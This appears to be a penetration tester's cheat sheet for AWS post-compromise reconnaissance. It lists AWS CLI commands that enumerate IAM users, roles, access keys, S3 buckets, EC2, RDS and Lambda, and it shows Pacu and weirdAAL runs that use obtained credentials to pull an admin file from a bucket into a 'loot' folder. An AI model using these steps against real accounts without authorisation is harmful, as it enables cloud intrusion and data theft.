- AWS Command Line https://aws.amazon.com/cli/
- use
--profile=<NAME>
to use a specific profile for executing the commands
- use
--profile=<name>
for a new profile
aws configure
aws sts get-caller-identity
aws ec2 describe-instances --region <region>
aws iam list-users
aws iam list-roles
aws iam list-access-keys --user-name <username>
aws iam list-roles
aws s3 ls s3://<bucketname>/
aws s3 sync s3://bucketname s3-files-dir
aws ec2 describe-instances
aws deploy list-applications
aws rds describe-db-instances --region <region name>
Knowing the VPC Security Group ID you can query the firewall rules to determine connectivity potential
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
aws lambda list-functions --region <region>
aws lambda get-function --function-name <lambda function>
aws ec2 describe-subnets
aws ec2 describe-network-interfaces
aws directconnect describe-connections
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami
cp env.sample .env
nano .env
#Add the following contents:
[default]
aws_access_key_id = <Access-key>
aws_secret_access_key = <Secret-access-key>
aws_session_token = <Session-Token>
python3 weirdAAL.py -m recon_all -t ssrf
python3 weirdAAL.py -m list_services_by_key -t ssrf
python3 weirdAAL.py -m s3_get_bucket_policy -a <s3 bucket> -t ssrf
python3 weirdAAL.py -m s3_download_file -a ‘<s3 bucket','admin-user.txt' -t ssrf
cat loot/<s3 bucket name>/admin-user.txt